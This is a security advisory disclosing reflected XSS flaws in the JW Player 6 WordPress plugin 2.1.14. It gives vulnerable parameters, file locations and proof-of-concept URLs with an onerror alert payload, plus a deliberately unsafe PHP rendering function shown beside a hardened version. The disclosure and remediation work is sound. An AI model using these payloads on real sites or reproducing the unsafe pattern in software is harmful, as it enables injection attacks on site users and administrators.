Subject: Cross-Site Scripting (XSS) in JW Player 6 Plugin for Wordpress 2.1.14
Date: Wed, 19 Aug 2015 11:47:41 +0200

Hello,

Plugin: JW Player 6 Plugin for Wordpress 2.1.14 https://wordpress.org/plugins/jw-player-plugin-for-wordpress/

1. Cross-Site Scripting (XSS) (Reflected)

Authenticated users (such as editors) can inject HTML/JS code, and the affected pages have no CSRF protection.

Method: GET
URL: http://localhost/wp-admin/upload.php?page=jwp6_playlists&playlist=[xss]
Vulnerable parameters: playlist, jwp6_playlists_playlist_select

Example PHP callstack:
/jw-player-plugin-for-wordpress/jwp6/jwp6-playlist-manager.php:301


Verification:
http://localhost/wp-admin/upload.php?page=jwp6_playlists&playlist=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E


There are many other XSS issues in jwp6-playlist-manager.php; another example:

Method: GET
URL: http://localhost/wp-admin/upload.php?page=jwp6_playlists&orderby=title&order=[xss]
Vulnerable parameters: order

Example PHP callstack:
/jw-player-plugin-for-wordpress/jwp6/jwp6-playlist-manager.php:365

Verification:
http://localhost/wp-admin/upload.php?page=jwp6_playlists&orderby=title&order=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E


Other possible XSS:

FlashVarState::render   [/jw-player-plugin-for-wordpress/admin/FlashVarState.php:87] $_POST['jwplayermodule_value']
AdminState::selectedPlayer   [/jw-player-plugin-for-wordpress/admin/AdminState.php:55] $_POST['jwplayermodule_new_player']
PluginState::getFooter   [/jw-player-plugin-for-wordpress/admin/PluginState.php:202] $_POST['jwplayermodule_player_plugins']
LTASState::render   [/jw-player-plugin-for-wordpress/admin/LTASState.php:93] $_POST['jwplayermodule_plugin_ltas_cc']
PluginState::render   [/jw-player-plugin-for-wordpress/admin/PluginState.php:167]
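As an added illustration of how the reported sinks should be handled (this is not code from the plugin or from the advisory author), below is a hypothetical renderer for the two GET parameters named above, `playlist` and `order`, first written in the unsafe interpolation pattern and then hardened. The function names, the markup and the choice of WordPress escapers are assumptions; the WordPress helpers are shimmed with htmlspecialchars() so the file also runs under plain `php` outside WordPress. The same rule (validate enums, escape free text for the exact output context) applies to the $_POST sinks listed above.

```php
<?php
// Added example, not the plugin's code. Shim the WordPress escapers so this
// file runs stand-alone; inside WordPress the real esc_attr()/esc_html() are used.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

/**
 * Vulnerable pattern (assumed for illustration): the raw query values are
 * interpolated into an attribute and a URL, so a value such as
 * "><img src=x onerror=alert(1) /> closes the attribute and injects markup.
 */
function jwp6_render_playlist_filter_unsafe(array $get) {
    $playlist = isset($get['playlist']) ? $get['playlist'] : '';
    $order    = isset($get['order']) ? $get['order'] : 'asc';
    return '<input type="hidden" name="playlist" value="' . $playlist . '" />'
         . '<a href="?page=jwp6_playlists&orderby=title&order=' . $order . '">Title</a>';
}

/**
 * Hardened version:
 *  - `order` can only ever be "asc" or "desc", so it is validated against a
 *    whitelist instead of being escaped; unknown values fall back to a default;
 *  - `playlist` is free text, so it is escaped for the context it lands in
 *    (esc_attr inside an attribute, esc_html inside element text);
 *  - the literal "&" in the link is written as &amp; so the HTML stays valid.
 */
function jwp6_render_playlist_filter_safe(array $get) {
    $playlist = isset($get['playlist']) ? (string) $get['playlist'] : '';
    $order    = isset($get['order']) ? strtolower((string) $get['order']) : 'asc';
    if (!in_array($order, array('asc', 'desc'), true)) {
        $order = 'asc';
    }
    $next = ($order === 'asc') ? 'desc' : 'asc';
    return '<input type="hidden" name="playlist" value="' . esc_attr($playlist) . '" />'
         . '<a href="?page=jwp6_playlists&amp;orderby=title&amp;order=' . esc_attr($next) . '">Title</a>'
         . '<p>Playlist: ' . esc_html($playlist) . '</p>';
}

// For the state-changing $_POST handlers, output escaping is not enough on its
// own: emit a nonce with wp_nonce_field() in the form and verify it with
// check_admin_referer() before acting on the request, which closes the CSRF gap.

// Demonstration using the advisory's own probe value for both parameters.
$probe = array(
    'playlist' => '"><img src=x onerror=alert(1) />',
    'order'    => '"><img src=x onerror=alert(1) />',
);
$unsafe = jwp6_render_playlist_filter_unsafe($probe);
$safe   = jwp6_render_playlist_filter_safe($probe);

// The unsafe render contains a live <img ... onerror> element; the hardened
// render contains only entity-encoded text and a whitelisted sort direction.
echo 'unsafe output contains <img: ', var_export(strpos($unsafe, '<img') !== false, true), "\n";
echo 'safe output contains <img:   ', var_export(strpos($safe, '<img') !== false, true), "\n";
echo $safe, "\n";
```

The split between validating `order` and escaping `playlist` is deliberate: an enumerated value should never reach an escaper at all, while free text must be escaped with the helper that matches its output context, since an attribute-safe string is not automatically safe inside a script block or a URL.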


--
Regards,
Marcin Probola,